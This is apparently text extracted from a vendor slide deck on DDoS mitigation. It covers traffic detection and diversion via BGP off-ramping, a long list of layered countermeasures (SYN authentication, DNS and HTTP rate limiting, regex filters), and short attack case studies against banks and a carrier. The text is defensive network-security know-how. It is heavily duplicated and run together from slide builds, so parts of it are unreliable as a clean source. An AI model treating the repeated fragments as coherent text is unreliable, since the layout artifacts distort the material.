TMSTMS

DDoS - Mitigation

1. Detect(Network wide: CP using Flow)

CPCP

TMSTMS

DDoS - Mitigation

1. Detect(Network wide: CP using Flow)

2. Activate TMS (manual or automatic)

CPCP

TMSTMS

DDoS - Mitigation

1. Detect(Network wide: CP using Flow)

2. Activate TMS (manual or automatic)3. Divert Traffic (Network wide: BGP OFF-Ramp announcement)

CPCP

TMSTMS

DDoS - Mitigation

1. Detect(Network wide: CP using Flow)

2. Activate TMS (manual or automatic)

4. Clean the Traffic and forward the legitimate(Network wide: using ON-Ramp Technique [e.g. MPLS, GRE, VLAN, ])

3. Divert Traffic (Network wide: BGP OFF-Ramp announcement)

CPCP

TMSTMS

DDoS - Mitigation

1. Detect(Network wide: CP using Flow)

2. Activate TMS (manual or automatic)

4. Clean the Traffic and forward the legitimate(Network wide: using ON-Ramp Technique [e.g. MPLS, GRE, VLAN, ])

5. Protected

3. Divert Traffic (Network wide: BGP OFF-Ramp announcement)

CPCP

TMSTMS

StatelessStatic&DynamicPacketPreventions

StatelessStatic&DynamicPacketPreventions

InvalidPackets&BehavioralPreventions

InvalidPackets&BehavioralPreventions

Malformed&ClientChallenge

ResponsePreventions

Malformed&ClientChallenge

ResponsePreventions

HTTP(s),DNS,SIPApplicationLayer&BehavioralPreventions

HTTP(s),DNS,SIPApplicationLayer&BehavioralPreventions

DynamicAttackPreventions

(e.g.AIFSignatures)

DynamicAttackPreventions

(e.g.AIFSignatures)

Each Source is evaluated by the Multi-Layer-Countermeasures

Specialized Multi-Layer-Countermeasures toBlock Complex DDoS Attacks

FloodingAttacksFloodingAttacks

ProtocolAttacksProtocolAttacks

SessionAttacksSessionAttacks

Application,Slow&LowAttacks

Application,Slow&LowAttacks

DynamicBotnet&Tool

Attacks

DynamicBotnet&Tool

Attacks

DDoS Multi-Layer-Countermeasure (Overview)

ZombieDetectionZombieDetection INVALIDPacketsINVALIDPackets SYNFLOODPreventionSYNFLOODPrevention

FlexibleRatebasedBlocking

FlexibleRatebasedBlocking

IPLOCATIONBlocking

IPLOCATIONBlocking

IPLocationPolicingIPLocationPolicing TCPCONNECTIONVerificationTCPCONNECTION

VerificationIPBlack/White

ListingIPBlack/White

ListingSYN

AUTHENTICATIONSYN

AUTHENTICATIONFRAGMENTATION

PreventionFRAGMENTATION

Prevention

LargeIP/FCAP&DNS &HTTP

FilterLists

LargeIP/FCAP&DNS &HTTP

FilterLists

PAYLOADFilter

PAYLOADFilter

ATLASINTELLIGENCEFEED(AIF)Prevention

ATLASINTELLIGENCEFEED(AIF)Prevention

SSL/TLSPROTOCOLMULTIATTACKPrevention

SSL/TLSPROTOCOLMULTIATTACKPrevention

URLBlockingURLBlocking

HTTPMALFORMEDPrevention

HTTPMALFORMEDPrevention

HTTPAUTHENTICATION

HTTPAUTHENTICATION

HTTPFLOODPreventionHTTPFLOODPrevention

HTTPBASICBOTNETPrevention

HTTPBASICBOTNETPrevention

HTTPREGULAREXPRESSIONFilterHTTPREGULAR

EXPRESSIONFilter

DNSAUTHENTICATION

DNSAUTHENTICATION

DNSREQUESTLimiting

DNSREQUESTLimiting

DNSNXDOMAINRateLimiting

DNSNXDOMAINRateLimiting

DNSMALFORMEDPrevention

DNSMALFORMEDPrevention

DNSDOMAINBlacklisting

DNSDOMAINBlacklisting

DNSREGULAREXPRESSIONFilterDNSREGULAR

EXPRESSIONFilterMULTIPLESIPPreventionsMULTIPLESIPPreventions

ICMPFLOODPreventionICMPFLOODPrevention TrafficShapingTrafficShaping

+many others ...growing

+many others ...growing

Multilayer Protection /Countermeasures by groups

FilterListFilterList ChallengersChallengersTraffic

Limiting/Shaping

TrafficLimiting/Shaping

HeuristicsHeuristics SignaturesSignatures

PCAPs StaticBlacklist Static,

Whitelist Dynamic

Blacklist, Countries Multicast Private

Address

TCPAuthentication

DNSAuthentication

HTTPAuthentication

Ratebase TCP

Connection DNSRate DNS

NXDomainRate

HTTPRate ICMPRate UDPRate

TCPConnectionsReset

WebCrawlerSupport

CDNAndProxySupport

TLSAttacks TCPSyncFlood Fragment

Detection Application

Misbehavior

RegularExpressions

DNSRegularExpressions

HTTPRegularExpressions

BotnetPrevention

CloudPeakflow mitigation OnsitemitigationPravail

OpAbabil (AlQaeda): Attack to USS Banks

~67GbpsAttacktraffic

~14GbpsLeakedtraffic

MultiVector HTTP Attack to a Large Bank

HTTPRegularExpression:^AcceptLanguage:ru$

StandardCountermeasures notworking

Low&SlowCountermeasures:SlowLoris

Attack to a Large Carrier

8Gbps stoppedbyIPFilterlist.

1 Mpps of Malformed DNS traffic.

Real Time packet capture

Agenda

86

Smart.Secure.Available.

Attack TechniquesWhat is DDoS?

Defense Techniques War Games

Thank You